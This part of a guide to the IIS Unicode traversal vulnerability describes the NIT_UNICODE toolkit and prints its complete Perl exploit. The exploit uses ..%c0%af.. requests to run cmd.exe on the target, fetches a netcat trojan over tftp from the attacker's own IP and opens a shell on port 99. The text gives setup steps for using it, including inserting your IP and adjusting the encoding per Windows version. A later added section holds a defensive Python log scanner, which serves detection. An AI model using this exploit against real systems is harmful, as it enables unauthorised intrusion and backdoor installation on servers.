The Complete Guide to the Unicode Encoding Vulnerability, Part 5

/ns/ld/win/data/20010426131538.htm

―――――――――――――――――――――――――――――――――
V. Analysis of Some Unicode Scanners Available on the Internet (continued)
3. The NIT_UNICODE attack toolkit
Download address: http://packetstorm.securify.com/0011-exploits/NIT_UNICODE.zip
The archive contains the following files:
uni.pl ------- the main Perl program that scans for the Unicode encoding vulnerability
uniexe.pl ----- the Perl program that carries out the TFTP transfer
ncx99.exe ----- a netcat trojan that binds a telnet shell to port 99
tftpd32.exe ----- TFTP server setup software
tftpd32.hlp ----- its help file
flie_id.diz
vendinfo.diz
readme.file ----- usage instructions and examples
This package uses the Unicode encoding vulnerability to upload ncx99.exe to the target host and start it, so that the attacker can telnet to port 99 of the target host, log in, and carry out further attacks from there.
Before the program below can be used, one thing has to be changed: find the line
$command="tftp -i xxx.xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe";
and replace xxx.xxx.xxx.xxx with your own IP address, then save the file.
This line transfers NCX99.EXE from your host to c:\inetpub\scripts\ on the target host under the new name nit.exe.
In addition, the ..%c0%af.. sequence in the program must be adjusted to the target host's NT version; for example, if the target is Windows 2000, change it to ..%c1%1c..

#!/usr/bin/perl
# This is for educational purposes only!
# WHO LET THEM DOGS OUT!
# Use uni.pl first to see if this is a vulnerable server!
# Based on the script unicodeexecute.pl from Roelof Temmingh
# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme

use Socket;

if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command\n";}
($host,$port)=split(/:/,$ARGV[0]);
$target = inet_aton($host);

# Step 1: list /scripts and see whether nit.exe is already there
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n\cls");
foreach $line (@results){
if ($line =~ /nit.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {

#You need to change the xxx.xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i xxx.xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ /nit.exe/ )) {$failed2=0;}
}
}

# Step 2: run the command given on the command line through the same request
$command=$ARGV[1];
print "\n\nHit CTRL-C if this is Hanging";

$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}   # read the whole response
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }

}
# NIT IN THE YEAR 2000
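As an added, defender-side example (not part of the original article or of the NIT_UNICODE package), the following Python script shows why the two sequences named above, %c0%af and %c1%1c, matter: a lenient decoder that computes the code point without checking for overlong forms or for a valid continuation byte collapses them to '/' and '\', so the request path climbs out of /scripts into the system directory. The script emulates that decoding, canonicalises each logged request path and flags the lines whose path escapes the web root. The log lines, IP addresses and finding labels are constructed for this example.

```python
"""Flag overlong-UTF-8 directory traversal (the IIS Unicode-bug pattern) in web server logs.

Added example for this article; it is not part of the NIT_UNICODE package.
"""
from urllib.parse import unquote_to_bytes

# Constructed sample log lines in IIS W3C style (date time c-ip method uri-stem uri-query status).
# They are made up for this example; the first two mirror the request shape used by uniexe.pl.
SAMPLE_LOG = """\
2001-04-26 13:15:38 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-04-26 13:15:40 10.0.0.5 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2001-04-26 13:16:02 10.0.0.9 GET /index.htm - 200
2001-04-26 13:16:10 10.0.0.9 GET /scripts/search.asp q=caf%c3%a9 200
2001-04-26 13:16:12 10.0.0.9 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404
"""


def lenient_utf8_decode(raw: bytes):
    """Decode bytes the way the vulnerable canonicaliser effectively did.

    A strict decoder rejects lead bytes 0xC0/0xC1 (always overlong) and any second
    byte outside 0x80-0xBF. Here such 2-byte sequences are instead computed as
    ((lead & 0x1F) << 6) | (second & 0x3F), so %c0%af -> '/' and %c1%1c -> '\\'.
    Well-formed UTF-8 is decoded strictly. Returns (text, list of accepted bad sequences).
    """
    out, bad, i = [], [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            nxt = raw[i + 1]
            cp = ((b & 0x1F) << 6) | (nxt & 0x3F)
            if cp < 0x80 or not 0x80 <= nxt <= 0xBF:  # overlong, or bad continuation byte
                bad.append(f"%{b:02x}%{nxt:02x}")
                out.append(chr(cp))
                i += 2
                continue
        # Strict path: ASCII or a well-formed multi-byte sequence; anything else -> U+FFFD
        n = 1 if b < 0x80 else 2 if b <= 0xDF else 3 if b <= 0xEF else 4
        try:
            out.append(raw[i:i + n].decode("utf-8"))
            i += n
        except UnicodeDecodeError:
            out.append("\ufffd")
            i += 1
    return "".join(out), bad


def analyse_request(stem: str, query: str) -> dict:
    """Canonicalise one request path and return the findings for it."""
    decoded, malformed = lenient_utf8_decode(unquote_to_bytes(stem))
    canon = decoded.replace("\\", "/")
    findings = [f"malformed-utf8:{seq}" for seq in malformed]
    # Walk the segments; a depth below zero means '..' climbed above the web root
    depth, escapes = 0, False
    for seg in canon.split("/"):
        if seg == "..":
            depth -= 1
            escapes = escapes or depth < 0
        elif seg and seg != ".":
            depth += 1
    if escapes:
        findings.append("traversal-escapes-webroot")
    if "cmd.exe" in canon.lower():
        findings.append("command-interpreter-in-path")
    return {"decoded": canon, "query": query, "findings": findings}


def scan_log(text: str) -> list:
    """Return one record per log line that produced at least one finding."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) != 7:
            continue
        _date, _time, ip, _method, stem, query, _status = parts
        result = analyse_request(stem, query)
        if result["findings"]:
            hits.append({"line": n, "ip": ip, "decoded": result["decoded"],
                         "findings": result["findings"]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} {hit['ip']} {hit['decoded']} -> {', '.join(hit['findings'])}")
```

Run directly, the script reports lines 1, 2 and 5 and leaves the legitimate caf%c3%a9 request alone. The same check belongs on a reverse proxy or in a log pipeline; on the server side, a strict UTF-8 decoder that rejects 0xC0/0xC1 lead bytes and non-continuation second bytes before any path canonicalisation removes the ambiguity the tool above relies on.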